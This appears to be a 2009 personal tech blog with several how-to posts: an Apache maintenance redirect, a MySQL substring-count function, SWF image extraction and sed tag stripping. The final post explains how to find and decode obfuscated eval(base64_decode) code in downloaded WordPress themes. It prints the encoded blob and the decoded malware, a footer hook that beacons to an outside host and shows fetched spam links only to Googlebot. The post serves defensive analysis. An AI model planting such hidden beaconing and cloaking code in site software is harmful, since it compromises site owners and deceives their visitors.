17 Nov 2009 Create a temporary “Site Down” notice in Apache
This post describes how to make a “Site down for maintenance” notice using Apache .htaccess and the mod_rewrite module.
I assume you know how to enable the Apache htaccess directive and the mod_rewrite module.
First you need to create a .htaccess file in your root level of your website.
Next you add the following lines to it
Options +FollowSymlinks
RewriteEngine on
RewriteCond %{REQUEST_URI} !/sitedown.html$
RewriteRule $ /sitedown.html [R=302,L]
The .htaccess file should be “active” immediately and you should see the content of your sitedown.html file. If not, try clearing your browsers cache.
If you as a maintenance user would like to access the site without seeing the sitedown.html file, add the following line to enable IP address exception
RewriteCond %{REMOTE_HOST} !^192\.168\.0\.12
Remember to replace the IP address with your address.
The .htaccess file should now look something like this.
Options +FollowSymlinks
RewriteEngine on
RewriteCond %{REQUEST_URI} !/sitedown.html$
RewriteCond %{REMOTE_HOST} !^192\.168\.0\.12
RewriteRule $ /sitedown.html [R=302,L]
Just delete the .htaccess file when you are done with your maintenance and your site will be available again.
Posted by Hans-Henry Jakobsen
23 Oct 2009 mysql alternative to PHP substr_count function
The substr_count function in PHP counts the number of substring occurrences. This post describes how to create a mysql stored function to behave just like PHP’s substr_count function.
This function can be created from your mysql console
delimiter || DROP FUNCTION IF EXISTS substrCount|| CREATE FUNCTION substrCount(s VARCHAR(255), ss VARCHAR(255)) RETURNS TINYINT(3) UNSIGNED LANGUAGE SQL NOT DETERMINISTIC READS SQL DATA BEGIN DECLARE count TINYINT(3) UNSIGNED; DECLARE offset TINYINT(3) UNSIGNED; DECLARE CONTINUE HANDLER FOR SQLSTATE '02000' SET s = NULL; SET count = 0; SET offset = 1; REPEAT IF NOT ISNULL(s) AND offset > 0 THEN SET offset = LOCATE(ss, s, offset); IF offset > 0 THEN SET count = count + 1; SET offset = offset + 1; END IF; END IF; UNTIL ISNULL(s) OR offset = 0 END REPEAT; RETURN count; END; || delimiter ;
Usage
Example 1
SELECT substrCount('/this/is/a/path', '/') `count`;
`count` would return 4 in this case. Can be used in such cases where you might want to find the “depth” of a path, or for many other uses.
This function is great to count the content of mysql ENUM and SET field data types.
Example 2
SELECT substrcount(
`tablename` , ','
) as tablename
FROM `tablename`
where substrcount(
`tablename` , ','
);
The content of table named tablename is a comma separated list generated from mysql ENUM datatype
2000/2001,2001/2002,2002/2003,2003/2004,2004/2005,2005/2006,2006/2007,2007/2008,2008/2009,2009/2010
In Example 2 the result from this query would be 9, telling us that there are 9 commas in this tablerow.
Source: Posted by Andrew Hanna on August 24 2006 8:04pm
Tags: howto, MySQL, PHP, stored functions
Posted by Hans-Henry Jakobsen
24 Jun 2009 Howto decompose a SWF Adobe Flash file
This post describes howto decompose a SWF Flash-file using linux and a program named swfextract. The post came to life because I had to do some changes to one of my flash presentations but I had deleted all the source files. After searching the Internet i doscovered swfextract.
SWF Tools is a collection of SWF (Flash) manipulation and creation utilities like pdf2swf, jpeg2swf, png2swf, gif2swf, font2swf, wav2swf, swfcombine, swfdump, swfstrings, swfbbox and swfc. But I’m only going to use swfextract in this post.
If you don’t have it installed on your system, download it and install the deb-package
# wget http://http.us.debian.org/debian/pool/main/s/swftools/swftools_0.8.1-2.1_i386.deb # dpkg -i swftools_0.8.1-2.1_i386.deb
The swftools package depends on several packages like libgif4 libt1-5 and they should be installed before swftools
# aptitude install libgif4 libt1-5
I was interested in extracting the image files in my Flash presentation and did the following to determine what was in the presentation file
# swfextract flashfile.swf Objects in file flashfile.swf: [-i] 5 Shapes: ID(s) 1, 3, 5, 7, 9 [-j] 4 JPEGs: ID(s) 2, 6, 8, 10 [-f] 1 Frame: ID(s) 0
As we see above there are 4 JPEG-files I'm interested in extracting and their IDs.
I did the following to extract the image files
# swfextract -i 2 -j 2,6,8,10 flashfile.swf
Result files
output.swf pic10.jpg pic2.jpg pic6.jpg pic8.jpg
If you don't use the -i switch you will end up with only one output.jpg file.
You are now ready to recreate the Flash presentation using the extracted image files.
Source
http://www.swftools.org
SWF Tools
Tags: adobe, decompose, extract, Flash, howto, SWF, swfextract
Posted by Hans-Henry Jakobsen
12 Jun 2009 Replace specific HTML tags using sed and regular expression
In this post I would like to replace all <embed> HTML tags in a HTML file with a <strong> tag.
# sed -e 's/<embed[^>]*>/<strong>/g' filename.html > newfile.html
And if you would like to remove the <embed> tag altogether
# sed -e 's/<embed[^>]*>//g' filename.html > newfile.html
To remove all HTML tags in a file
# sed -e 's/<[^>]*>//g' filename.html > newfile.html
The result file newfile.html is now without any < HTML tags >.
Tags: html, regexp, replace, sed
Posted by Hans-Henry Jakobsen
22 May 2009 WordPress themes with eval and base64_decode lines
Lately I’ve been downloading and reading myself up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1
eval(base64_decode('abcdefgh....')
and other variations like
Example 2
eval(gzinflate(str_rot13(base64_decode('abcdefgh...')
This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your WordPress installation
grep eval |grep decode | grep php * -R
I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.
Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.
The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.
<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
function a($a){ return base64_decode($a);}
while(!$b){
if(substr($a,0,4) == 'eval' || !$count){
$a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a);
$count++;
}else
$b = true;
}
echo $a;
?>
To run it from a console window you can do the following, not as a privileged user in case it does something nasty.
php scriptname.php > result.txt
My text would output the following text to the result.txt file
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get = '/wpam/';$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
}
add_action("wp_footer", "wp_get_footer_meta");
You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes are doing this to hide their WordPress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.
Source: The decoder script was found here
Tags: base64_decode, eval, gzinflate, PHP, str_rot13, Wordpress, Wordpress theme
Posted by Hans-Henry Jakobsen
